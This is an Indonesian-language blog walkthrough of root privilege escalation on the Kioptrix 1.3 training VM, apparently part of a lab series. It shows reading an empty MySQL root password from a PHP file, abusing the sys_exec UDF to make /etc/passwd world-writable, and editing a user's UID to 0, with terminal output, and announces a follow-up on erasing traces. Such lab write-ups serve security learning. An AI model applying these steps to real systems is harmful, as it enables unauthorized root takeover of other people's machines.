Penetration Testing Kioptrix Server 1.3: Mendapatkan Akses Root [3]
Selanjutnya adalah mengincar akses root untuk bisa menguasai sistem secara penuh. Dengan cara mengubah akses john menjadi root perlu mencari tahu proses yang berjalan pada akses root, biasanya adalah mysql. Nah dengan bantuan service mysql file /etc/passwd
akan dimdofikasi. File ```/etc/passwd`` adalah file yang menyimpan informasi konfigurasi akun pada linux. Akan tetapi hanya akses root yang bisa mengubah file tersebut. Untuk itulah cari ini dilakukan.
- Pertama-tama cari tau dulu proses-proses yang berjalan dengan akses root. Maka jalankan perintah diterminal :
ps -aux | grep root
hasil nya adalah seperti dibawah ini :
john@Kioptrix4:~$ ps -aux | grep root
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1 0.1 0.1 2844 1692 ? Ss 05:31 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S< 05:31 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 05:31 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 05:31 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 05:31 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 05:31 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 05:31 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 05:31 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 05:31 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 05:31 0:00 [kacpi_notify]
root 90 0.0 0.0 0 0 ? S< 05:31 0:00 [kseriod]
root 128 0.0 0.0 0 0 ? S 05:31 0:00 [pdflush]
root 129 0.0 0.0 0 0 ? S 05:31 0:00 [pdflush]
root 130 0.0 0.0 0 0 ? S< 05:31 0:00 [kswapd0]
root 172 0.0 0.0 0 0 ? S< 05:31 0:00 [aio/0]
root 1262 0.0 0.0 0 0 ? S< 05:31 0:00 [ata/0]
root 1265 0.0 0.0 0 0 ? S< 05:31 0:00 [ata_aux]
root 1274 0.0 0.0 0 0 ? S< 05:31 0:00 [scsi_eh_0]
root 1277 0.0 0.0 0 0 ? S< 05:31 0:00 [scsi_eh_1]
root 1297 0.0 0.0 0 0 ? S< 05:31 0:00 [ksuspend_usbd]
root 1300 0.0 0.0 0 0 ? S< 05:31 0:00 [khubd]
root 2028 0.0 0.0 0 0 ? S< 05:31 0:00 [scsi_eh_2]
root 2307 0.0 0.0 0 0 ? S< 05:31 0:00 [kjournald]
root 2474 0.0 0.0 2224 640 ? S<s 05:31 0:00 /sbin/udevd --d
root 3106 0.0 0.0 0 0 ? S< 05:31 0:00 [kpsmoused]
root 3998 0.0 0.0 1716 484 tty4 Ss+ 05:32 0:00 /sbin/getty 384
root 3999 0.0 0.0 1716 492 tty5 Ss+ 05:32 0:00 /sbin/getty 384
root 4003 0.0 0.0 1716 488 tty2 Ss+ 05:32 0:00 /sbin/getty 384
root 4004 0.0 0.0 1716 488 tty3 Ss+ 05:32 0:00 /sbin/getty 384
root 4006 0.0 0.0 1716 488 tty6 Ss+ 05:32 0:00 /sbin/getty 384
root 4066 0.0 0.0 1872 540 ? S 05:32 0:00 /bin/dd bs 1 if
root 4087 0.0 0.0 5316 988 ? Ss 05:32 0:00 /usr/sbin/sshd
root 4143 0.0 0.0 1772 528 ? S 05:32 0:00 /bin/sh /usr/bi
root 4185 0.0 1.5 126988 16228 ? Sl 05:32 0:00 /usr/sbin/mysql
root 4187 0.0 0.0 1700 556 ? S 05:32 0:00 logger -p daemo
root 4300 0.0 0.1 6528 1320 ? Ss 05:32 0:00 /usr/sbin/nmbd
root 4302 0.0 0.2 10108 2312 ? Ss 05:32 0:00 /usr/sbin/smbd
root 4316 0.0 0.0 10108 1024 ? S 05:32 0:00 /usr/sbin/smbd
root 4317 0.0 0.1 8084 1292 ? Ss 05:32 0:00 /usr/sbin/winbi
root 4337 0.0 0.1 8084 1056 ? S 05:32 0:00 /usr/sbin/winbi
root 4349 0.0 0.0 2104 888 ? Ss 05:32 0:00 /usr/sbin/cron
root 4371 0.0 0.5 20464 6188 ? Ss 05:33 0:00 /usr/sbin/apach
root 4417 0.0 0.0 1716 492 tty1 Ss+ 05:33 0:00 /sbin/getty 384
root 4423 0.0 0.3 11360 3716 ? Ss 05:37 0:00 sshd: john [pri
john 4464 0.0 0.0 3008 772 pts/0 R+ 05:40 0:00 grep root
kita fokus pada proses ini saja :
root 4185 0.0 1.5 126988 16228 ? Sl 05:32 0:00 /usr/sbin/mysql
kesimpulan :
dari proses diatas dapat disimpulkan bahwa proses mysql dijalankan oleh hak akses root. Mysql adalah database yang digunakan pada website server Kioptrix. Untuk itu kita perlu masuk ke dalam mysql server Kioptrix. Akan tetapi untuk masuk kedalam mysql diperlukan username dan password juga.
- Jika di perhatikan ketika akses login dihalaman web server Kioptrix diperlukan check kondisi login disana pada file checklogin.php. Maka dapat disimpulkan bahwa didalam file checklogin.php tersebut terdapat koneksi ke mysql dimana diperlukan username dan password mysql juga. Jadi kita akan coba melihat isi file tersebut dengan perintah diterminal :
cat /var/www/checklogin.php
kesimpulan :
username = root
password = (kosong)
- Lalu kita coba masuk kedalam mysql.
mysql -h localhost -u root
keterangan :
- -h adalah host.
- -u adalah root.
- -p adalah password. Jika password tidak kosong tambahkan setelah root. Dalam kasus ini password adalah kosong.
Jika seperti gambar dibawah ini maka telah masuk ke dalam mysql.
- Selanjutnya didalam mysql ketikan :
select sys_exec("chmod 777 /etc/passwd");
Jika seperti gambar ini output nya maka sukses mengubah akses dari file /etc/passwd
.
5. Selanjutnya coba check file /etc/passwd
dengan perintah :
ls -l /etc/passwd
okey sekarang semua user pada sistem memiliki hak akses penuh untuk file tersebut.
- Selanjutnya edit file tersebut.
vim /etc/passwd
rubah bagian :
john:x:1001:1001:,,,:/home/john:/bin/kshell
menjadi
john:x:0:0:,,,:/home/john:/bin/bash
untuk melakukan edit pada vim menggunakan keyword :
- i untuk insert/menulis.
- esc setelah menulis.
- :w untuk menyimpan.
- :q untuk exit dari vim
- setelah diedit, logout terlebih dulu. dengan perintah
exit
. - Login lagi dengan user John.
maka nama disamping kiri akan langsung berubah menjadi root@Kioptrix4. dan untuk memastikan lebih pasti maka masukan perintah :
cat /root/congrats.txt
Tralaaa Berhasiiiiil....
Selanjutnya akan dibahas cara menghapus jejak yang telah dilakukan.
Semoga bermanfaat dan jika ada salah mohon dikoreksi dan komen dibawah.